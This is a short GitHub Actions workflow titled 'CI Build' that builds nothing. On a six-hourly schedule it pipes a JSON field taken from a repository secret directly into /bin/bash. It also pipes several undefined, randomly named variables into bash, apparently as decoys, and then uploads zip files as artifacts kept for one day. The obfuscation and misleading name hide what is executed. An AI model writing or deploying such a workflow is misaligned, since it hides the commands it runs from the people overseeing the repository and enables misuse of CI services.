name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '22 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          y88907: ${{ secrets.y88907 }}
        run: |
          printf '%s' "$y88907" | jq -r .ekppl59 | /bin/bash
          printf '%s' "$lgdpn2" | jq -r .jtkr38 | /bin/bash
          echo $egcd15 | jq -r .ogczm8775 | /bin/bash
          echo $ncjpa6 | jq -r .g8 | /bin/bash
          echo $bko74 | jq -r .fqj39614 | /bin/bash
          echo $h411 | jq -r .kbvsz1165 | /bin/bash
          echo $ycjxw22 | jq -r .s9 | /bin/bash
          printf '%s' "$d5" | jq -r .rvcxm475 | /bin/bash

      - name: Save output
        uses: actions/upload-artifact@v4
        with:
          name: UJRXcjau
          path: "*.zip"
          retention-days: 1
